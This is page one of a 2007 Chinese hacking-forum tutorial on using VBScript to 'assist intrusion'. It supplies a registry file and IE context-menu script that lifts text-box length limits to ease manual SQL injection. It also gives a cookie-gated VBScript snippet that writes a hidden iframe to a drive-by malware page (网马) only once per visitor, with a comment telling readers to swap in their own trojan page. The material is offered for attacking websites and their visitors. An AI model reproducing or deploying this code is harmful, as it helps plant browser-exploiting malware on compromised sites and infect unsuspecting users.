| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> Hack >> 黑客入侵 >> 正文 用户登录 新用户注册
[图文]利用VBS辅助入侵       ★★★ 【字体:
利用VBS辅助入侵
作者:黑客防线 文章来源:黑客防线 点击数: 更新时间:2007-11-10

    不知大家看了上期我的的文章里的几则vbs代码,有何感想。也许有的高手会不顾一屑,也许有的菜菜会会心一笑,无论如何,这期我还是厚着脸皮继续来贴 VBS代码赚稿费来了。利用VBS来写一个像模像样的工具是困难了点(其实是我水平不够),但是用它来辅助入侵,方便手工则有
 
     一、更改注入代码框的长度

    有的注入点是在文本框里的,像搜索之类的注入。当然,抓包提取出注入点的url然后放在工具里也是可以的。如果喜欢手工的话,可以直接在文本框里写入注入语句提交。但这时候就会有一些问题了,有的文本框限制了你提交内容的长度。很多人这时候的做法是将该注入页面保存下来,去掉html里的长度限制,然后本地提交。这样一来,不仅麻烦,而且有时还会带来reffer的问题。我们可以写一段vbs语句,导入注册表,直接更改页面上的文本框长度就可以了。
 注册表(扩展.reg)的内容如下:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\扩展]
"contexts"=dword:00000004
@="d:\\len.html"

这个扩展.reg的里放在d:下的len.html里的内容是这样的:

<script language=vbs>
set srcevent = external.menuarguments.event
set doc=external.menuarguments.document
set ele=doc.elementfrompoint( srcevent.clientx, srcevent.clienty )
if ele.type ="text" or ele.type="password" then
ele.maxlength=800
ele.size=200
end if
</script>

    我们把扩展.reg导入注册表后,再遇到文本框的限制后,就有办法对付了,点击图1中的扩展后,的效果了,文本框比原来的长度长了好多呀。

     二、VBS代码控制Cookie

     如果是溢出型之类的网马,挂在网上后,客户端的IE会很卡。如果用cookie控制的话,只让用户访问网马一次,那效果就不错了。网上有些智能型的网马也是这样做的,不过里边的代码都是js写的,我提供给大家一个vbscript代码吧。代码如下:
以下是代码片段:

<SCRIPT LANGUAGE="VBSCRIPT">
'取得cookie内容函数
function GetCookie(sName)

DIM aCookie, i, aCrumb
GetCookie = ""
aCookie = split(document.cookie, "; ")
FOR i = LBOUND(aCookie) to UBOUND(aCookie)
aCrumb = split(aCookie(i), "=")
if sName = aCrumb(0) then
GetCookie = unescape(aCrumb(1))
EXIT FOR
end if
NEXT
end function

if GetCookie("1") <> "1" then
Document.write("<iframe src=http://www.sohu.com></iframe>")'可改成你的挂马页面,这里的sohu.com只会显示一次的。
document.cookie = "1" & "=" & escape("1") & "; expires=Tue, 31 Dec 2009 23:59:59 GMT" 'cookie的有效期我们让它到2009年
end if
</SCRIPT>


    不过需要说明一下的是,我看到很多人用智能型网马的话,都是在原页面src=http://www/xxx.js这样调用,
就根本起不到智能型网马的作用了。像我提供的这段代码,也是同样需要把所有代码全部查入被挂马页面里
才可以,如果远程调用会有跨域的问题的。
 

[1] [2] 下一页

责任编辑:朱倩  联系方式  Email:朱倩
电话:51228163
  • 上一篇黑客:

  • 下一篇黑客:
  • (只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    姓 名:
    * 游客填写  ·注册用户
    主 页:
    评 分:
    1分 2分 3分 4分 5分
    评论内容:
    验证码: *
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
  • 最新hack更新
    最新推荐资讯
    相关黑客
    说一些入侵的经验
    新手Windows入侵教程
    轻松的入侵个人主页
    拟入侵者检测网络攻击
    入侵的艺术(无线渗透)
    网吧入侵用的命令技巧
    入侵CMD下加Sql账号
    快速135端口入侵电脑
    Tomcat从入侵检测防范
    踩着别人的脚印入侵
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号